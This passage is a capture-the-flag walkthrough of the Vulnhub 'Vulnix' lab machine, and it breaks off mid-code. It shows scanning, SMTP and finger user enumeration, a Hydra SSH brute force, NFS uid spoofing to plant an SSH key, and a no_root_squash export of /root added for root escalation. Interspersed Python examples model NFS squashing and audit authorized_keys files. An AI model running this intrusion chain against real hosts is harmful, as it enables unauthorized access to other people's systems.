Vulnix Walkthrough

Today we will be doing the walkthrough for the machine called Vulnix from Vulnhub.

Link for the VM: https://www.vulnhub.com/entry/hacklab-vulnix,48/

Let's start:

Machine IP address: 192.168.56.16

root@kali:~/vulnix# netdiscover -i eth1 -r 192.168.56.0/24

 Currently scanning: Finished!   |   Screen View: Unique Hosts

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:00      1      60  Unknown vendor
 192.168.56.2    08:00:27:2e:85:97      1      60  PCS Systemtechnik GmbH
 192.168.56.16   08:00:27:fa:b2:da      1      60  PCS Systemtechnik GmbH

Service Enumeration:

root@kali:~/vulnix# nmap -A -Pn -p- -oA vul -T4 192.168.56.16
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-10 16:55 EDT
Nmap scan report for 192.168.56.16
Host is up (0.0097s latency).
Not shown: 65518 closed ports
PORT      STATE SERVICE  VERSION
22/tcp    open  ssh      OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 10:cd:9e:a0:e4:e0:30:24:3e:bd:67:5f:75:4a:33:bf (DSA)
|   2048 bc:f9:24:07:2f:cb:76:80:0d:27:a6:48:52:0a:24:3a (RSA)
|_  256 4d:bb:4a:c1:18:e8:da:d1:82:6f:58:52:9c:ee:34:5f (ECDSA)
25/tcp    open  smtp     Postfix smtpd
|_smtp-commands: vulnix, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
|_ssl-date: 2019-08-10T20:56:29+00:00; +26s from scanner time.
79/tcp    open  finger   Linux fingerd
|_finger: No one logged on.\x0D
110/tcp   open  pop3     Dovecot pop3d
|_pop3-capabilities: CAPA UIDL SASL RESP-CODES STLS PIPELINING TOP
|_ssl-date: 2019-08-10T20:56:29+00:00; +27s from scanner time.
111/tcp   open  rpcbind  2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      36521/udp  mountd
|   100005  1,2,3      51820/tcp  mountd
|   100021  1,3,4      41797/udp  nlockmgr
|   100021  1,3,4      42073/tcp  nlockmgr
|   100024  1          43593/udp  status
|   100024  1          60558/tcp  status
|   100227  2,3         2049/tcp  nfs_acl
|_  100227  2,3         2049/udp  nfs_acl
143/tcp   open  imap     Dovecot imapd
|_imap-capabilities: IMAP4rev1 SASL-IR LOGIN-REFERRALS LITERAL+ STARTTLS more listed ENABLE LOGINDISABLEDA0001 have capabilities Pre-login OK post-login ID IDLE
|_ssl-date: 2019-08-10T20:56:30+00:00; +27s from scanner time.
512/tcp   open  exec     netkit-rsh rexecd
513/tcp   open  login    OpenBSD or Solaris rlogind
514/tcp   open  shell    Netkit rshd
993/tcp   open  ssl/imaps?
|_ssl-date: 2019-08-10T20:56:29+00:00; +27s from scanner time.
995/tcp   open  ssl/pop3s?
|_ssl-date: 2019-08-10T20:56:28+00:00; +26s from scanner time.
2049/tcp  open  nfs_acl  2-3 (RPC #100227)
35893/tcp open  mountd   1-3 (RPC #100005)
42073/tcp open  nlockmgr 1-4 (RPC #100021)
51820/tcp open  mountd   1-3 (RPC #100005)
58619/tcp open  mountd   1-3 (RPC #100005)
60558/tcp open  status   1 (RPC #100024)
MAC Address: 08:00:27:FA:B2:DA (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10
Network Distance: 1 hop
Service Info: Host: vulnix; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 26s, deviation: 0s, median: 26s

TRACEROUTE
HOP RTT ADDRESS
1 9.66 ms 192.168.56.16

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 175.17 seconds
root@kali:~/vulnix#

As per the above output, multiple services are running on the machine.

With the SMTP service, we can enumerate the users on the machine.
With the Finger service, we can enumerate the users logged on to the machine.
With NFS, we can find out whether we have access to files/directories on the machine.

Let's see what we can find.

SMTP enumeration

From the SMTP enumeration, we found that the users below exist on the machine.

root@kali:~/vulnix# smtp-user-enum -M VRFY -U common.txt -t 192.168.56.16
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

root@kali:~/vulnix# smtp-user-enum -M VRFY -U unix_users.txt -t 192.168.56.16
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Mode ..................... VRFY
Worker Processes ......... 5
Usernames file ........... unix_users.txt
Target count ............. 1
Username count ........... 113
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............

## Scan started at Sat Aug 10 17:09:42 2019

192.168.56.16: ROOT exists
192.168.56.16: backup exists
192.168.56.16: bin exists
192.168.56.16: daemon exists
192.168.56.16: gnats exists
192.168.56.16: games exists
192.168.56.16: irc exists
192.168.56.16: list exists
192.168.56.16: libuuid exists
192.168.56.16: lp exists
192.168.56.16: mail exists
192.168.56.16: man exists
192.168.56.16: messagebus exists
192.168.56.16: news exists
192.168.56.16: nobody exists
192.168.56.16: postmaster exists
192.168.56.16: proxy exists
192.168.56.16: root exists
192.168.56.16: sshd exists
192.168.56.16: sync exists
192.168.56.16: sys exists
192.168.56.16: syslog exists
192.168.56.16: user exists
192.168.56.16: uucp exists
192.168.56.16: www-data exists

## Scan completed at Sat Aug 10 17:09:43 2019

25 results.

113 queries in 1 seconds (113.0 queries / sec)
root@kali:~/vulnix#
root@kali:~/vulnix#

Finger Enumeration

user.txt contains all the users from the SMTP enumeration.

root@kali:~/vulnix# ./finger_enum_user.sh user.txt
User : ROOT
finger: ROOT: no such user.

User : backup
Login: backup Name: backup
Directory: /var/backups Shell: /bin/sh
Never logged in.
No mail.
No Plan.

User : bin
Login: bin Name: bin
Directory: /bin Shell: /bin/sh
Never logged in.
No mail.
No Plan.

User : daemon
Login: daemon Name: daemon
Directory: /usr/sbin Shell: /bin/sh
Never logged in.
No mail.
No Plan.

User : gnats
Login: gnats Name: Gnats Bug-Reporting System (admin)
Directory: /var/lib/gnats Shell: /bin/sh
Never logged in.
No mail.
No Plan.

User : games
Login: games Name: games
Directory: /usr/games Shell: /bin/sh
Never logged in.
No mail.
No Plan.

User : irc
Login: irc Name: ircd
Directory: /var/run/ircd Shell: /bin/sh
Never logged in.
No mail.
No Plan.

User : list
Login: list Name: Mailing List Manager
Directory: /var/list Shell: /bin/sh
Never logged in.
No mail.
No Plan.

User : libuuid
Login: libuuid Name:
Directory: /var/lib/libuuid Shell: /bin/sh
Never logged in.
No mail.
No Plan.

User : lp
Login: lp Name: lp
Directory: /var/spool/lpd Shell: /bin/sh
Never logged in.
No mail.
No Plan.

User : mail
Login: mail Name: mail
Directory: /var/mail Shell: /bin/sh
Never logged in.
No mail.
No Plan.

Login: dovecot Name: Dovecot mail server
Directory: /usr/lib/dovecot Shell: /bin/false
Never logged in.
No mail.
No Plan.

User : man
Login: man Name: man
Directory: /var/cache/man Shell: /bin/sh
Never logged in.
No mail.
No Plan.

User : messagebus
Login: messagebus Name:
Directory: /var/run/dbus Shell: /bin/false
Never logged in.
No mail.
No Plan.

User : news
Login: news Name: news
Directory: /var/spool/news Shell: /bin/sh
Never logged in.
No mail.
No Plan.

User : nobody
Login: nobody Name: nobody
Directory: /nonexistent Shell: /bin/sh
Never logged in.
No mail.
No Plan.

User : postmaster
finger: postmaster: no such user.

User : proxy
Login: proxy Name: proxy
Directory: /bin Shell: /bin/sh
Never logged in.
No mail.
No Plan.

User : root
Login: root Name: root
Directory: /root Shell: /bin/bash
Last login Fri Aug 2 23:46 (BST) on pts/0 from 192.168.56.4
No mail.
No Plan.

User : sshd
Login: sshd Name:
Directory: /var/run/sshd Shell: /usr/sbin/nologin
Never logged in.
No mail.
No Plan.

User : sync
Login: sync Name: sync
Directory: /bin Shell: /bin/sync
Never logged in.
No mail.
No Plan.

User : sys
Login: sys Name: sys
Directory: /dev Shell: /bin/sh
Never logged in.
No mail.
No Plan.

User : syslog
Login: syslog Name:
Directory: /home/syslog Shell: /bin/false
Never logged in.
No mail.
No Plan.

User : user
Login: user Name: user
Directory: /home/user Shell: /bin/bash
Never logged in.
No mail.
No Plan.

Login: dovenull Name: Dovecot login user
Directory: /nonexistent Shell: /bin/false
Never logged in.
No mail.
No Plan.

User : uucp
Login: uucp Name: uucp
Directory: /var/spool/uucp Shell: /bin/sh
Never logged in.
No mail.
No Plan.

User : www-data
Login: www-data Name: www-data
Directory: /var/www Shell: /bin/sh
Never logged in.
No mail.
No Plan.

User :
No one logged on.

From the above, we are interested in 2 users: root and user.

Let's proceed further.

Using Hydra to brute-force SSH for the user "user", we found the password letmein. For root, we didn't find anything.

root@kali:~/vulnix# hydra -l user -P rockyou.txt ssh://192.168.56.16
Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-08-10 17:13:58
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task

NFS enumeration

root@kali:~/vulnix# showmount -e 192.168.56.16
Export list for 192.168.56.16:
/home/vulnix *
root@kali:~/vulnix#

We can access /home/vulnix. Let's see what we can find there.

root@kali:~/vulnix# mkdir mnt
root@kali:~/vulnix#

root@kali:~/vulnix# mount 192.168.56.16:/home/vulnix mnt
root@kali:~/vulnix# ls -alrth
total 286M
drwxr-x--- 2 nobody 4294967294 4.0K Sep 2 2012 mnt

The mount shows nobody as the owner.

root@kali:~/vulnix# cd mnt/
bash: cd: mnt/: Permission denied
root@kali:~/vulnix#

and we get Permission denied.

After googling for some time, I found this about root_squash, which can be causing this.

https://en.wikipedia.org/wiki/Unix_security#Root_squash
http://fullyautolinux.blogspot.com/2015/11/nfs-norootsquash-and-suid-basic-nfs.html

By default, mount will use NFS v4 to mount the directories. Google research suggested using version 3. Let's try that.

root@kali:~/vulnix# mount -o vers=3 192.168.56.16:/home/vulnix mnt

root@kali:~/vulnix# ls -alrth
total 286M
drwxr-x--- 2 2008 2008 4.0K Sep 2 2012 mnt

If you look closely, mnt has been mounted with the user and group shown as 2008. You have probably never seen a user and group ID like this; you have always seen a username and group name in ls output. So why are we seeing a numeric user ID and group ID here?

The reason is that this user ID and group ID are not assigned to any user on this machine (the Kali machine). Therefore, on mounting this share on the Kali machine, ls shows the raw user ID and group ID.

If we try to cd into mnt, we get Permission denied.

root@kali:~/vulnix# cd mnt/
bash: cd: mnt/: Permission denied
root@kali:~/vulnix#

Now we need to know which user or group ID 2008 belongs to. If we can find that, we can create a user/group with that ID on the Kali machine, and then we may be able to access the mnt share directory.

Now, how to find that user? Remember, we are mounting /home/vulnix from the target machine (192.168.56.16) onto the mnt directory on the Kali machine.
If we log in to the target machine and check the /etc/passwd file (if we have access), we can see which user has ID 2008. So let's try that.

Remember, we have SSH access for user "user" with password "letmein", which we got from the Hydra brute force.

root@kali:~/vulnix# ssh user@192.168.56.16
The authenticity of host '192.168.56.16 (192.168.56.16)' can't be established.
ECDSA key fingerprint is SHA256:IGOuLMZRTuUvY58a8TN+ef/1zyRCAHk0qYP4wMViOAg.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.56.16' (ECDSA) to the list of known hosts.
user@192.168.56.16's password:
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Sat Aug 10 22:58:20 BST 2019

  System load:  0.0              Processes:           88
  Usage of /:   90.2% of 773MB   Users logged in:     0
  Memory usage: 3%               IP address for eth0: 192.168.56.16
  Swap usage:   0%

  => / is using 90.2% of 773MB

  Graph this data and manage this system at https://landscape.canonical.com/

user@vulnix:~$

There are 2 users in the home directory.

user@vulnix:/home$ ls -alrth
total 16K
drwxr-xr-x 22 root root 4.0K Sep 2 2012 ..
drwxr-xr-x 4 root root 4.0K Sep 2 2012 .
drwxr-x--- 2 vulnix vulnix 4.0K Sep 2 2012 vulnix
drwxr-x--- 3 user user 4.0K Sep 2 2012 user
user@vulnix:/home$

user@vulnix:~$
user@vulnix:~$ cat /etc/passwd

landscape:x:107:113::/var/lib/landscape:/bin/false
sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin
user:x:1000:1000:user,,,:/home/user:/bin/bash
vulnix:x:2008:2008::/home/vulnix:/bin/bash
statd:x:109:65534::/var/lib/nfs:/bin/false
user@vulnix:~$

user@vulnix:/etc$ cat group

sambashare:x:116:
vulnix:x:2008:
user@vulnix:/etc$

As per /etc/passwd, 2008 belongs to user vulnix. Also, group ID 2008 belongs to the vulnix group.

So this means we need to create the user vulnix with user ID 2008 (on the Kali machine) to access the share /home/vulnix on the Kali machine. Similarly, we need to create the group vulnix with group ID 2008 on the Kali machine.

So let's do that.

Creating group vulnix with ID 2008 on the Kali machine.

root@kali:~/vulnix# groupadd -g 2008 vulnix
root@kali:~/vulnix#

Creating user vulnix with ID 2008 on the Kali machine and assigning it to group ID 2008.

root@kali:~/vulnix# useradd -u 2008 vulnix -g 2008
root@kali:~/vulnix#

Now let's mount again.

root@kali:~/vulnix# mount -o vers=3 192.168.56.16:/home/vulnix mnt
root@kali:~/vulnix#

root@kali:~/vulnix# ls -alrth
total 286M
drwxr-x--- 2 vulnix vulnix 4.0K Sep 2 2012 mnt

So the mnt share on the Kali machine has the same user and group as /home/vulnix on the target machine. (Remember, we are mounting /home/vulnix from the target machine onto mnt on the Kali machine.)

Exploitation:

Let's dive in.

root@kali:~/vulnix# cd mnt/
bash: cd: mnt/: Permission denied
root@kali:~/vulnix#

Aha. What happened? We have covered all the points.

Until now we have been the root user. But mnt is accessible by the vulnix user (which we created on the Kali machine). So we need to switch to the vulnix user, and then we can access the mnt folder.
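Why root on Kali is refused while a local account with uid 2008 gets in, and why the v3 mount listed a bare 2008 until that account existed, both follow from how NFSv3 with AUTH_SYS credentials handles identity: the client sends bare numeric uid/gid values, the server applies squashing, and then the ordinary mode bits are checked; the client's ls can only print a name if its own passwd file knows that uid. The Python below is an added example that models this, not code from the walkthrough. The anonymous id 65534 is the Linux knfsd default, and the passwd snippets are constructed.

```python
"""Model of how an NFSv3 server (AUTH_SYS credentials) decides whether a
client may traverse an exported directory, and how the client's `ls`
renders the owner it gets back. Added example; not part of the walkthrough.
ANON_UID/ANON_GID are the Linux defaults (anonuid/anongid); the passwd
snippets below are constructed, not copied from either machine."""
from dataclasses import dataclass

ANON_UID = 65534
ANON_GID = 65534


@dataclass(frozen=True)
class Identity:
    uid: int
    gid: int


def parse_options(opts: str) -> set:
    """'rw,root_squash' -> {'rw', 'root_squash'}."""
    return {o.strip() for o in opts.split(",") if o.strip()}


def squash(options: set, client: Identity) -> Identity:
    """Identity the server acts with, given what the client asserted.

    With AUTH_SYS the server trusts the numeric uid/gid in the RPC call, so
    squashing is the only thing between a remote uid 0 and local root.
    root_squash is the default; no_root_squash disables it; all_squash maps
    every client identity to the anonymous one.
    """
    if "all_squash" in options:
        return Identity(ANON_UID, ANON_GID)
    if client.uid == 0 and "no_root_squash" not in options:
        return Identity(ANON_UID, ANON_GID)
    return client


def permission_bits(mode: int, owner: Identity, who: Identity) -> int:
    """rwx bits (0-7) that apply to `who` on a file with this mode and owner."""
    if who.uid == 0:
        return 7  # unsquashed root: CAP_DAC_OVERRIDE bypasses the mode bits
    if who.uid == owner.uid:
        return (mode >> 6) & 7
    if who.gid == owner.gid:
        return (mode >> 3) & 7
    return mode & 7


def can_traverse(export_opts: str, owner: Identity, mode: int, client: Identity) -> bool:
    """Can `client` cd into a directory with this owner/mode under these export options?"""
    effective = squash(parse_options(export_opts), client)
    return bool(permission_bits(mode, owner, effective) & 1)  # x bit = traverse


def display_owner(uid: int, passwd_text: str) -> str:
    """What `ls -l` on the client prints: a name if the client's passwd has the
    uid, otherwise the bare number (NFSv3 never carries names, only numbers)."""
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 3 and fields[2] == str(uid):
            return fields[0]
    return str(uid)


# Constructed client-side passwd snippets: before and after `useradd -u 2008 vulnix`.
CLIENT_PASSWD_BEFORE = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n"
)
CLIENT_PASSWD_AFTER = CLIENT_PASSWD_BEFORE + "vulnix:x:2008:2008::/home/vulnix:/bin/sh\n"

# The directory the walkthrough mounts: drwxr-x--- owned by 2008:2008.
VULNIX_HOME = Identity(2008, 2008)
VULNIX_HOME_MODE = 0o750

if __name__ == "__main__":
    root_client = Identity(0, 0)
    vulnix_client = Identity(2008, 2008)
    print("root via root_squash:", can_traverse("rw,root_squash", VULNIX_HOME, VULNIX_HOME_MODE, root_client))
    print("uid 2008 via root_squash:", can_traverse("rw,root_squash", VULNIX_HOME, VULNIX_HOME_MODE, vulnix_client))
    print("root on /root with no_root_squash:", can_traverse("rw,no_root_squash", Identity(0, 0), 0o700, root_client))
    print("ls shows:", display_owner(2008, CLIENT_PASSWD_BEFORE), "->", display_owner(2008, CLIENT_PASSWD_AFTER))
```

The model makes the defensive point explicit: nothing in the protocol verifies the uid the client claims, so an export that relies on root_squash alone is only as safe as the set of hosts allowed to mount it.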

root@kali:~/vulnix# su vulnix
$ id
uid=2008(vulnix) gid=2008(vulnix) groups=2008(vulnix)
$ /bin/bash -i
vulnix@kali:/root/vulnix$

vulnix@kali:/root/vulnix$ cd mnt/
vulnix@kali:/root/vulnix/mnt$ ls -alrth
total 20K
-rw-r--r-- 1 vulnix vulnix 675 Apr 3 2012 .profile
-rw-r--r-- 1 vulnix vulnix 3.5K Apr 3 2012 .bashrc
-rw-r--r-- 1 vulnix vulnix 220 Apr 3 2012 .bash_logout
drwxr-x--- 2 vulnix vulnix 4.0K Sep 2 2012 .
drwxr-xr-x 3 root root 4.0K Aug 10 17:24 ..
vulnix@kali:/root/vulnix/mnt$

So we can access the share mnt, or /home/vulnix. Congrats for reaching this far 🙂

Read carefully from here, as we will be switching back and forth between the two machines.

As per the above output, user vulnix (on the Kali machine) has read/write access. So this means the vulnix user can read, write or create any file or directory, right?

Now as you know, we are mounting an NFS share, so any changes we make in this directory (mnt) on the Kali machine will be reflected in the /home/vulnix directory on the target machine. (If this is confusing or not clear, read up on NFS shares and it will make sense 🙂)

Now we need a root shell on the target machine, and we have 2 options for now.

  1. Log in as user "user" with password letmein and try to escalate to root, OR
  2. If somehow possible, log in as the vulnix user and then try to escalate to root.

Also, we have seen earlier in the /etc/passwd file that there is a vulnix user. We don't know the password for the vulnix user yet.

Since SSH is the login service we have, we can safely assume that we can log in via SSH to the target machine.

There are 2 methods to log in via SSH.

  1. Password
  2. SSH keys

For the vulnix user, we don't have a password, so we can try to log in via a key.

To log in via SSH key, the public key should be present in .ssh/authorized_keys in the user's home directory. More on this: https://www.ssh.com/ssh/authorized_keys/

We have r/w access to the /home/vulnix folder via mnt (on the Kali machine), so we can generate a private/public key pair and put the public key in the .ssh/authorized_keys file.

Let's do this.

Creating private/public keys

root@kali:~/vulnix# ssh-keygen -h
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): /root/vulnix/keys
/root/vulnix/keys already exists.
Overwrite (y/n)? y
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/vulnix/keys.
Your public key has been saved in /root/vulnix/keys.pub.
The key fingerprint is:
SHA256:T/FrRYF/3JAd+ttBbHi9u+/Y6L8o690MGnOzY95d/i4 root@kali
The key's randomart image is:
+---[RSA 2048]----+
| ..+.|
| . .o|
| . +.Bo|
| o . =|
| S . . .= |
| o o =|
| .oo+ oo|
| ooE=+|
| .+==@&|
+----[SHA256]-----+
root@kali:~/vulnix#

I have my public and private key.

root@kali:~/vulnix# ls -alrt | grep key
-rw-r--r-- 1 root root 391 Aug 10 18:37 keys.pub
-rw------- 1 root root 1811 Aug 10 18:37 keys
root@kali:~/vulnix#

Copying the public key into .ssh/authorized_keys in /home/vulnix (on the target machine) via the mnt folder on the Kali machine.

Creating the .ssh folder

vulnix@kali:/root/vulnix/mnt$ mkdir .ssh
vulnix@kali:/root/vulnix/mnt$ cd .ssh

Copying the public key into the authorized_keys file

vulnix@kali:/root/vulnix/mnt/.ssh$ echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCrgyNNgtxvnMs6qF7IR2X9eAwb6U5KRlmjnICvDE1m9+wE4D34NdTPuEtY024kEr4yV++9SY9srM/t+cBi1Z6fXgAp8QSAZTltM7SlGzHFZA01WfsK+AWrWSMHlNta8UdSNOdlMD7hdwJHQU5tEvPdSSLjJaOHHxFG3OAaXnEXNlS08Z1qt/2i7Z4ZXwRx2lyWfw3IURlytJLv7P57wb4aaIk0aKsxFRW4DccdlYSNna2TjEvWOtse7+fdoYCyNzHYoseUqgi09Wx4oEep543BlJ6h4dt7E3oep95kP9REIvoU8qvUS2wk+GJF6670X8jCafJSoQRy7C3sXyWiWtXz root@kali" >authorized_keys
vulnix@kali:/root/vulnix/mnt/.ssh$

vulnix@kali:/root/vulnix/mnt/.ssh$
vulnix@kali:/root/vulnix/mnt/.ssh$ ls -alrth
total 12K
drwxr-x--- 3 vulnix vulnix 4.0K Aug 10 18:39 ..
-rw-r--r-- 1 vulnix vulnix 391 Aug 10 2019 authorized_keys
drwxr-xr-x 2 vulnix vulnix 4.0K Aug 10 2019 .
vulnix@kali:/root/vulnix/mnt/.ssh$

Now, as I mentioned earlier, the target machine (192.168.56.16) has the same file under the /home/vulnix home directory.
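What an administrator auditing that home directory would want is a listing of every key that can now log in, with its type, size and fingerprint, compared against the keys that are supposed to be there. The Python below is an added example, not part of the walkthrough: it reads authorized_keys lines the way sshd does (optional options field, key type, base64 blob, comment) and computes the same SHA256 fingerprint that ssh-keygen -lf prints. The RSA line is the public key written above; the ed25519 entry and the allow-list are constructed.

```python
"""Audit a user's ~/.ssh/authorized_keys: parse each entry, recover key type,
size and SHA256 fingerprint, and report keys that are not on an allow-list.
Added example, not code from the walkthrough. The RSA line is the public key
the walkthrough writes into authorized_keys; the ed25519 line and the
allow-list used in __main__ are constructed here."""
import base64
import hashlib
import struct

KEY_TYPES = {"ssh-rsa", "ssh-dss", "ssh-ed25519",
             "ecdsa-sha2-nistp256", "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521"}


def _ssh_string(data: bytes) -> bytes:
    """Encode one SSH wire-format string: 4-byte big-endian length + bytes."""
    return struct.pack(">I", len(data)) + data


def _read_ssh_string(buf: bytes, off: int):
    """Decode one SSH wire-format string at `off`; return (bytes, next offset)."""
    (length,) = struct.unpack_from(">I", buf, off)
    start = off + 4
    return buf[start:start + length], start + length


def key_bits(blob: bytes) -> int:
    """Key size as ssh-keygen reports it, derived from the wire-format blob."""
    ktype, off = _read_ssh_string(blob, 0)
    ktype = ktype.decode()
    if ktype == "ssh-rsa":
        _, off = _read_ssh_string(blob, off)          # public exponent e (mpint)
        modulus, _ = _read_ssh_string(blob, off)      # modulus n (mpint)
        return int.from_bytes(modulus, "big").bit_length()
    if ktype == "ssh-dss":
        p, _ = _read_ssh_string(blob, off)            # prime p (mpint)
        return int.from_bytes(p, "big").bit_length()
    if ktype == "ssh-ed25519":
        return 256
    if ktype.startswith("ecdsa-sha2-nistp"):
        return int(ktype[-3:])
    raise ValueError(f"unsupported key type {ktype!r}")


def fingerprint(blob: bytes) -> str:
    """OpenSSH-style fingerprint: base64 of SHA256(blob), '=' padding stripped."""
    digest = hashlib.sha256(blob).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_authorized_keys(text: str):
    """One dict per key line. The key-type token anchors the parse, so a leading
    options field (from=, no-pty, command=...) is preserved verbatim. Quoted
    option values that themselves contain spaces are not handled here."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        tokens = line.split()
        idx = next((i for i, t in enumerate(tokens) if t in KEY_TYPES), None)
        if idx is None or idx + 1 >= len(tokens):
            entries.append({"line": lineno, "error": "no recognised key"})
            continue
        blob = base64.b64decode(tokens[idx + 1])
        entries.append({
            "line": lineno,
            "options": " ".join(tokens[:idx]),
            "type": tokens[idx],
            "bits": key_bits(blob),
            "fingerprint": fingerprint(blob),
            "comment": " ".join(tokens[idx + 2:]),
        })
    return entries


def unexpected_keys(text: str, allowed_fingerprints: set):
    """Entries whose fingerprint is not on the allow-list (parse failures included)."""
    return [e for e in parse_authorized_keys(text) if e.get("fingerprint") not in allowed_fingerprints]


# Public key the walkthrough writes into /home/vulnix/.ssh/authorized_keys.
WALKTHROUGH_RSA_LINE = (
    "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCrgyNNgtxvnMs6qF7IR2X9eAwb6U5KRlmjnICvDE1m9+wE4D34NdTPuEtY024kEr4yV++9SY9srM/t+cBi1Z6fXgAp8QSAZTltM7SlGzHFZA01WfsK+AWrWSMHlNta8UdSNOdlMD7hdwJHQU5tEvPdSSLjJaOHHxFG3OAaXnEXNlS08Z1qt/2i7Z4ZXwRx2lyWfw3IURlytJLv7P57wb4aaIk0aKsxFRW4DccdlYSNna2TjEvWOtse7+fdoYCyNzHYoseUqgi09Wx4oEep543BlJ6h4dt7E3oep95kP9REIvoU8qvUS2wk+GJF6670X8jCafJSoQRy7C3sXyWiWtXz root@kali"
)

# Constructed ed25519 entry: 32 arbitrary bytes wrapped in the wire format.
CONSTRUCTED_ED25519_BLOB = base64.b64encode(
    _ssh_string(b"ssh-ed25519") + _ssh_string(bytes(range(32)))
).decode()

SAMPLE_AUTHORIZED_KEYS = f"""# constructed sample authorized_keys
from="192.168.56.4",no-pty ssh-ed25519 {CONSTRUCTED_ED25519_BLOB} backup@constructed
{WALKTHROUGH_RSA_LINE}
"""

if __name__ == "__main__":
    known = {fingerprint(base64.b64decode(CONSTRUCTED_ED25519_BLOB))}
    for entry in unexpected_keys(SAMPLE_AUTHORIZED_KEYS, known):
        print(f"line {entry['line']}: unexpected {entry.get('type')} {entry.get('bits')} "
              f"{entry.get('fingerprint')} {entry.get('comment')}")
```

Because the fingerprint is SHA256 over the same blob ssh-keygen hashes, the value printed for the RSA entry is directly comparable with what ssh-keygen reported when the key was generated, so an unknown fingerprint in a user's file is a concrete thing to alert on.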

We are all set to log in to the target machine as the vulnix user with SSH keys.

Let's do it

root@kali:~/vulnix# ssh -i keys vulnix@192.168.56.16
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Sat Aug 10 23:44:35 BST 2019

  System load:  0.0              Processes:           88
  Usage of /:   90.2% of 773MB   Users logged in:     0
  Memory usage: 3%               IP address for eth0: 192.168.56.16
  Swap usage:   0%

  => / is using 90.2% of 773MB

  Graph this data and manage this system at https://landscape.canonical.com/

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

vulnix@vulnix:~$

and we are in as the vulnix user.

Now we will enumerate more as this user to see how we can escalate to root.

vulnix@vulnix:~$
vulnix@vulnix:~$ sudo -l
Matching 'Defaults' entries for vulnix on this host:
env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User vulnix may run the following commands on this host:
(root) sudoedit /etc/exports, (root) NOPASSWD: sudoedit /etc/exports
vulnix@vulnix:~$

So we have access to sudoedit /etc/exports with root privileges and without any password; let's try that.

# /etc/exports: the access control list for filesystems which may be exported
#               to NFS clients.  See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes       hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4        gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes  gss/krb5i(rw,sync,no_subtree_check)
#
/home/vulnix *(rw,root_squash)

and we have root_squash enabled, which we talked about earlier.

Here we can add the root home directory with the no_root_squash option to share the root directory via NFS (found after a Google search).

So our file will look like this.

# /etc/exports: the access control list for filesystems which may be exported
#               to NFS clients.  See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes       hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4        gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes  gss/krb5i(rw,sync,no_subtree_check)
#
/home/vulnix *(rw,root_squash)
/root *(rw,no_root_squash)

After this we need to restart the target machine so that the changes take effect (found after a Google search).
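From the defender's side, the two things that matter in this file are the wildcard client and the no_root_squash option on an export of /root. The Python below is an added example, not anything from the walkthrough: it parses an exports file the way exports(5) describes (comments, several client specs per line, bare paths exported to everyone, and the classic space-before-options mistake) and reports the settings a reviewer would flag. The sample text is the final /etc/exports shown above plus one constructed line.

```python
"""Audit /etc/exports for settings that hand out more access than intended.
Added example, not code from the walkthrough. SAMPLE_EXPORTS is the file the
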